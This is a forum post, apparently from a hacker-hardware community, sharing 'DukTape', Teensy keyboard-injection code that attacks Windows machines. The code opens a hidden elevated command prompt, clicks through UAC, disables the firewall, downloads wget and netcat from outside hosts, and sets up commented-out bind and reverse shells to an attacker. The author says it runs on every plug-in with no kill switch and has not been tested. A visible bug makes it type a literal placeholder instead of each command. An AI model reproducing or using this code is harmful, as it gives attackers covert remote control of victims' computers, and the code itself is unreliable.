[win] Duktape

[str33ts0ld13r]

Greetings ducky lovers! Im very excited to finally be making a contribution to the rubber ducky project.

To get started you will need arduino and the phukdlib.

DukTape is nothing fancy (pun intended ). It will get you wget and a few other toys like nc then it opens a back door for you to get in. When complete it blinks (big surprise right!! haha) There is MUCH room for improvement on this but I sadly haven't had time to work on this as much as I would like.. Anyway I wanted to share what I have put together so far. Please feel free to modify, add, change what ever you like in this code. All that I ask is that you post you changes for the rest of the ducky community. As always constructive criticism is welcome and appreciated.

Warning: I have NOT had a chance to test this code with my teensy yet (had some hardware failure on my test boxes :( ). But it compiles fine for me.

Warning2: I haven't set up a kill switch feature yet to keep it from running on systems you dont want it to (ie your own system). So you have been warned, it runs every time you plug it in!

UPDATE: I just added a UAC handler and changed the way the cmd is launched to go through the start menu using ctrl and esc keys. (thanks H@L0_F00 for the ctrl esc combo you posted) and (thanks Jonny_Walked I used some of the code you posted, UAC handler, and used your cmd launcher)(If this code was Benownzu93's I thank you). Also the PHUCKED lib is no longer needed with the updated cmd launcher.

/*
################################
###########DukTape##############
################################

Readme:
To use DukTape make sure you have
the phukdlib installed in arduino.

I would like to thank everyone on
the Rubber Ducky forums http://www.hak5.org/forums/index.php?showforum=56
who I borrowed ideas and code from.

Debug is done through the serial monitor.
To disable it comment out/remove the code
marked as debug (ie.. //debug).

Delays may need to be adjusted...
*/

int ledPin = 11;

void setup()
{
  delay(5000); //initial delay
  pinMode(ledPin, OUTPUT); 

    Serial.begin(9600); //debug
    delay(200);           //debug
    Serial.println("START");//debug

  //start cmd hidden
  CMD();
  delay(1000);
  MoveWin();

  //prepare work area
  TypeCmd("mkdir %systemroot%\\winduk");
  TypeCmd("cd %systemroot%\\winduk");
  TypeCmd("netsh firewall set opmode disable");//kill firewall

  //ftp download wget
  TypeCmd("echo bin >>ftpcmd.txt");
  TypeCmd("echo cd /tex-archive/systems/texlive/tlnet/tlpkg/installer/wget/ >>ftpcmd.txt");
  TypeCmd("echo get wget.exe >>ftpcmd.txt");
  TypeCmd("echo quit >>ftpcmd.txt");
  TypeCmd("ftp -A -v -s:ftpcmd.txt cam.ctan.org"); //run ftp download
  delay(6000);
  TypeCmd("if NOT exist wget.exe ftp -A -v -s:ftpcmd.txt cam.ctan.org");//error recovery in case of wget download fail

    Serial.println("Ftp completed");//debug

  //Get more tools
  TypeCmd("if NOT exist unzip.exe wget -q http://stahlworks.com/dev/unzip.exe"); //get unzip
  TypeCmd("if NOT exist nircmd.zip wget -q http://www.nirsoft.net/utils/nircmd.zip");//get nircmd
  TypeCmd("if NOT exist nircmdc.exe unzip.exe -qq nircmd.zip"); //unzip nircmd
  TypeCmd("if NOT exist nc111nt.zip wget -q http://joncraton.org/media/files/nc111nt.zip"); //get netcat
  TypeCmd("if NOT exist nc.exe unzip.exe -qq nc111nt.zip nc.exe");//unzip netcat

  //Payload
  //TypeCmd("nc -l -p 1337 -d -e cmd.exe");//netcat listens on port leet and launches cmd when a connection is established
  /*TypeCmd("nc -d IP PORT -e cmd.exe");/*reverse netcat replace IP with your ipaddress and replace PORT with the port you use
  on the system you want to connect back to, run "nc -l -p PORT" without the quotes on your system to accept the reverse connection*/

  //clean up
  TypeCmd("if Exist nircmdc.exe del /Q nircmd.zip");
  TypeCmd("if EXIST ftpcmd.txt del /Q ftpcmd.txt");
  TypeCmd("if EXIST nc111nt.zip del /Q nc111nt.zip");
  TypeCmd("exit");//close cmd.
    Serial.println("ALL DONE!");//debug
}

void loop()                     
{
  digitalWrite(ledPin, HIGH);// LED on
  delay(500);
  digitalWrite(ledPin, LOW);// LED off
  delay(500);
}

void Enter()
{
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();
  Keyboard.set_key1(0);
  Keyboard.send_now();
  delay(100);
}

void TypeCmd(char *commandtotype)
{
  //must have cmd prompt open to work
  Keyboard.println("*commandtotype");
  delay(200);
  Enter();
  delay(2000);//Execution delay
    Serial.println("*commandtotype");//debug
}

void MoveWin()
{
  Keyboard.set_modifier(MODIFIERKEY_ALT);
  Keyboard.set_key1(KEY_SPACE);
  Keyboard.set_key2(KEY_M);
  Keyboard.send_now();
  delay(50);
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.set_key2(0);
  Keyboard.send_now();
  delay(50);
  for(int x=0; x<200; ++x){
    Keyboard.set_key1(KEY_UP);
    Keyboard.send_now();
    Keyboard.set_key1(0);
    Keyboard.send_now();
    delay(100);
   }
   Enter();
}

void UAC()
{
  Keyboard.set_modifier(MODIFIERKEY_ALT);
  Keyboard.set_key1(KEY_Y);
  Keyboard.send_now();
  delay(100);
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
}

void CMD()
{
  Keyboard.set_modifier(MODIFIERKEY_CTRL);
  Keyboard.set_key1(KEY_ESC);
  Keyboard.send_now();
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  Keyboard.print("cmd");
  delay(1000);
  Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_SHIFT);
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  delay(2000);
  UAC();
}

Edited August 3, 2010 by str33ts0ld13r